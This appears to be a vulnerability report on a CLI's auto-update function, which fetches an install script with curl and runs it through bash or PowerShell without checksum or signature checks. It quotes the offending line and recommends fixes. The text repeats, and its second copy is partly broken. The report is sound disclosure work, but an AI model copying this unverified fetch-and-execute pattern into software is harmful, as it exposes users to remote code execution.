Summary
The auto-update mechanism in packages/cli/src/update-check.ts downloads and executes a remote install script without cryptographic verification.
Location
- File:
packages/cli/src/update-check.ts
- Function:
performAutoUpdate()
- Lines: 279-345
Vulnerability
The function fetches the install script via HTTPS from a CDN and executes it directly:
const scriptBytes = executor.execFileSync('curl', ['--proto', '=https', '-fsSL', installUrl], ...);
// ... writes to temp file, then executes via bash/PowerShellWhile HTTPS provides transport security, there is no integrity verification (checksum, signature) of the downloaded script. If the CDN is compromised, DNS is hijacked, or a network attacker performs a TLS downgrade, arbitrary code execution is possible.
Impact
- An attacker who compromises the CDN or intercepts the download can execute arbitrary code with the user's privileges
- The auto-update runs automatically (when
SPAWN_AUTO_UPDATE=1) without user interaction
Recommendation
- Add SHA256 checksum verification of the downloaded script against a signed manifest
- Use GPG signature verification if available
- Consider pinning the CDN TLS certificate or using certificate transparency logs
Summary
The auto-update mechanism in
packages/cli/src/update-check.tsdownloads and executes a remote install script without cryptographic verification.Location
packages/cli/src/update-check.tsperformAutoUpdate()Vulnerability
The function fetches the install script via HTTPS from a CDN and executes it directly:
While HTTPS provides transport security, there is no integrity verification (checksum, signature) of the downloaded script. If the CDN is compromised, DNS is hijacked, or a network attacker performs a TLS downgrade, arbitrary code execution is possible.
Impact
SPAWN_AUTO_UPDATE=1) without user interactionRecommendation